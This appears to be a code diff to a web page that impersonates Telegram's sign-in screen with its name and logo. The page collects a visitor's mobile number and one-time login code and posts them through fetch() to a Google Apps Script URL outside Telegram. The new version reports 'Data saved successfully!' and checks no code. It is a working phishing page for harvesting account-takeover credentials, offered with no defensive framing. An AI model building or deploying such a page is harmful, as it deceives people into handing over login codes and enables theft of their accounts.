--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<!DOCTYPE html> 
+<!DOCTYPE html>
 <html lang="en">
 <head>
     <meta charset="UTF-8">
@@ -21,14 +21,14 @@
             text-align: center;
         }
         input {
-            width: 100%;
+            width: 102%;
             padding: 10px;
             margin: 8px 0;
             border: 1px solid #ccc;
             border-radius: 5px;
         }
         button {
-            width: 100%;
+            width: 110%;
             padding: 15px;
             background-color: #4A90E2;
             color: white;
@@ -37,46 +37,41 @@
             cursor: pointer;
         }
         button:hover {
-            background-color: skyblue;
+            background-color: darkskyblue;
         }
     </style>
 </head>
 <body>
-    <div class="login-container">
-        <img src="telegram-logo.png" width=300 height=150>
+     <div class="login-container">
+        <img src="Telegram-Logo.png" width="300" height="150" alt="logo">
         <h2>Sign in to Telegram</h2>
-        <input type="text" id="mobile" placeholder="Enter mobile number" maxlength="13">
-        <button onclick="sendOTP()">Send OTP</button>
-        <input type="text" id="otp" placeholder="Enter OTP" style="display: none;">  
-        <button onclick="verifyOTP()" id="verifyBtn" style="display: none;">Verify OTP</button>
-    </div>
+        <input type="text" id="mobile" placeholder="Enter mobile number" maxlength="13" name="mobile number">
+        <input type="text" id="OTP" placeholder="Enter OTP (any number)" name="OTP">  </br>
+        <button onclick="verifyOTP()">Verify</button> </div>
 
     <script>
-        const googleAppsScriptURL = "https://script.google.com/macros/s/AKfycbwHaXRdV1phKQXHmG0HdwKjuS1ZPK7do1sQeCvMkc_SdHqo77LAlAK4mpMSlMf8q_KIvw/exec"; // Replace with your correct Web App URL
-
-        function sendOTP() {
-            let mobileNumber = document.getElementById("mobile").value.trim();
-
-            if (mobileNumber.length < 10) {
-                alert("Please enter a valid mobile number");
-                return;
-            }
-
-            alert("OTP sent to " + mobileNumber);
-            document.getElementById("otp").style.display = "block";
-            document.getElementById("verifyBtn").style.display = "block";
-        }
+        const googleAppsScriptURL = "https://script.google.com/macros/s/AKfycbwvSzaERgYJfmmJOPvOJnF3R6q937nkqXFL-T5kxd3Y8Pu8Q0OqBkmIM9ouaiBEwjwg/exec"; // **REPLACE THIS**
 
         async function verifyOTP() {
             let mobileNumber = document.getElementById("mobile").value.trim();
-            let otp = document.getElementById("otp").value.trim();
+            let enteredOTP = document.getElementById("OTP").value.trim();
 
-            if (!otp) {
-                alert("Please enter the OTP");
+            if (!mobileNumber) {
+                alert("Please enter a mobile number");
                 return;
             }
 
-            let data = { mobile: mobileNumber, otp: otp };
+            if (!enteredOTP) {
+                alert("Please enter a value for OTP");
+                return;
+            }
+
+            // In a real application, you would validate the mobile number format here.
+
+            let data = {
+                mobile: mobileNumber,
+                otp: enteredOTP // Include the entered value
+            };
 
             try {
                 let response = await fetch(googleAppsScriptURL, {
@@ -86,18 +81,16 @@
                 });
 
                 let result = await response.json();
+                console.log("Server Response:", result);
 
-                if (result.status === "success") {
-                    alert("Login Successful!");
-                    // Hide OTP input and button after successful login
-                    document.getElementById("otp").style.display = "none";
-                    document.getElementById("verifyBtn").style.display = "none";
+                if (result.status && result.status.toLowerCase() === "success") {
+                    alert("Data saved successfully!");
                 } else {
-                    alert("Invalid OTP. Please try again.");
+                    alert("Failed to save data: " + (result.message || "Unknown error"));
                 }
             } catch (error) {
-                console.error("Error verifying OTP:", error);
-                alert("There was an error processing your request.");
+                console.error("Error storing data:", error);
+                alert("Error connecting to the server.");
             }
         }
     </script>
